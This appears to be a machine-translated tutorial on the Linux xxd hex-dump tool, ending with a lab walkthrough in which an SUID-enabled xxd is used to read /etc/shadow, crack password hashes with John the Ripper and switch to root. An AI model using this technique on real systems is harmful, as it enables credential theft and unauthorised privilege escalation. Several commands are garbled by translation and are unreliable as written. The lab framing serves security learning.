Shulou(Shulou.com)06/01 Report--

This article mainly introduces what is the Linux command for power promotion, which has a certain reference value. Interested friends can refer to it. I hope you will gain a lot after reading this article. Let's take a look at it.

Xxd introduction

We know that if we want to convert a file to another format, we can use some online conversion tools that can help us convert a file to almost any file format we need, such as "pdf to word,jpg to pdf,excel to pdf" and so on. But what if someone wants to convert any file to hexadecimal or binary form?

In fact, this is very simple, on Linux we can use the command xxd to do this. The xxd command can do a hexadecimal output for a given standard input or file, or it can convert the hexadecimal output to the original binary format. This also helps to encode and decode arbitrary files.

First, let's use the help/man command to see how the xxd command is used.

Xxd-h

The main actions performed using xxd

Convert the contents of the file to hexadecimal: for example, I created a new file called "secret.txt", and now I want to convert its contents to hexadecimal form, which I can execute by typing the following command:

Syntax: xxd filenamexxd secret.txt

As shown in the following figure, it is clear that xxd has generated a hexadecimal dump for the file "secret.txt".

Here we can observe that the following hexadecimal dump acquires its default format, for example:

Number of index rows

The default number of octets for each group is 2, and the packet size is 4 bytes.

The standard column is 16 bits long with spaces

Skip line n using xxd: when converting files, there is a lot of data that we may not need. Therefore, we can skip these contents. We can use xxd to skip the nth line and generate hexadecimal values after the skipped lines.

Assuming that in my current case, I want to generate a hexadecimal dump from line 5, I can do this by using the "- s" parameter followed by the xxd command.

Xxd-s 0x50 secret.txt

Limit the output to a specific length: I have explained above how to retrieve data by skipping the number of rows. However, if you want to limit the length of standard output, you can use the "- l" parameter.

Here, I limit the length of my content to print the data to a limited range, line 5, as shown in the following figure.

Xxd-l 0x50 secret.txt

Therefore, we can observe the difference between the two commands; the first command generates a hexadecimal value initialized from line 6, and the second command ends with line 5 based on the hexadecimal index. Please refer to the screenshot above.

Convert the contents of the file to binary: if you want to convert the file to binary form, you can use the "- b" option. The command is as follows:

Xxd-b secret.txt

Set the column length: above I have shown how to skip and limit the output to the range, but we can also set the column length. By default, it is 12, 16 for any dump file.

Default value: we know that the default column length is 16. This will print 16 characters, including spaces.

Xxd-l 0x20 secret.txt

Set the column length to 32: I used the "- l" option to set the end index to limit the range of print data. Then I set the length of the column to 32 using the "- c" parameter.

Xxd-l 0x40-c 32 secret.txt

From the following figure, we can see how xxd limits the column length.

Set the column length to 9: now we set the column length to "9".

Xxd-l 0x40-c 9 secret.txt

In all of these cases, xxd creates a hexadecimal dump for the file by counting each character with a space.

Pure hexadecimal dump: we can use the "- ps" option to output a continuous hexadecimal dump of postscript. Here we save its output in the hex file to get a pure hexadecimal dump of the secret.txt file. To verify the results, we use the cat command to read the output from the hex file.

Xxd-ps secret.txt > hex cat hex

From the following figure, we can see how xxd creates a pure hexadecimal dump for the "secret.txt" file.

Restore files: we can use the "- r" option to restore the contents of the converted files. In our example, I used "- r-p" to print the reverse output of a pure hexadecimal dump to ASCII format.

Xxd-r-p hex

Packet size bytes: if we need to group the output into multiple octets, we can use the "- g" option to do so. It is 2 by default. Therefore, if we set the value to 4, it will be grouped into 8 bits.

In the following figure, we set the value to 8, which groups 16 bits as output to simplify the result.

Xxd-l 0x30-g 8 secret.txt

SUID Lab Settin

SUID special permissions run the command with the owner's privileges, not with the executor's privileges. Now, let's enable SUID permissions on xxd so that local users have the opportunity to take advantage of xxd to gain root permissions.

Enable the SUID bit by typing the following command:

Which xxd chmod Utility / usr/bin/xxd ls-al / usr/bin/xxd

SUID utilization

Now, we will take advantage of the xxd service with the special permission bit SUID. To do this, I created a session of the victim machine, which will allow us to take advantage of local users of the target system.

Let's use ssh to connect to the target machine with the following command:

Ssh test@192.168.1.103

After successfully accessing the victim's machine, we use the find command to find binaries with SUID permissions.

Find /-perm-UBSs-type f 2 > / dev/null

Here we can see that there are many binaries with SUID bits, but we focus on / usr/bin/xxd.

Get the special permission bit SUID on xxd, and we will get the shadow file that is used to extract the password hash file.

As shown in the figure below, I have requested that the / etc/shadow file be exposed by using xxd, which will generate a hexadecimal dump for the file and pipe the xxd command to restore its output.

Xxd "/ etc/shadow" / xxd-r

Now, I will use the tool john the ripper to crack the hash password. In this way, we can get the user credentials, as shown in the following figure.

John hash

After obtaining the credentials, we can switch users. First, let's check the user's sudo permissions: raj, and find that the user "raj" has all permissions.

Su raj sudo-l sudo su

So let's switch directly to the root user account and access root shell. So far, we have successfully promoted our user privileges by using the xxd command.

Thank you for reading this article carefully. I hope the article "what is the Linux order for empowerment" shared by the editor will be helpful to you. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.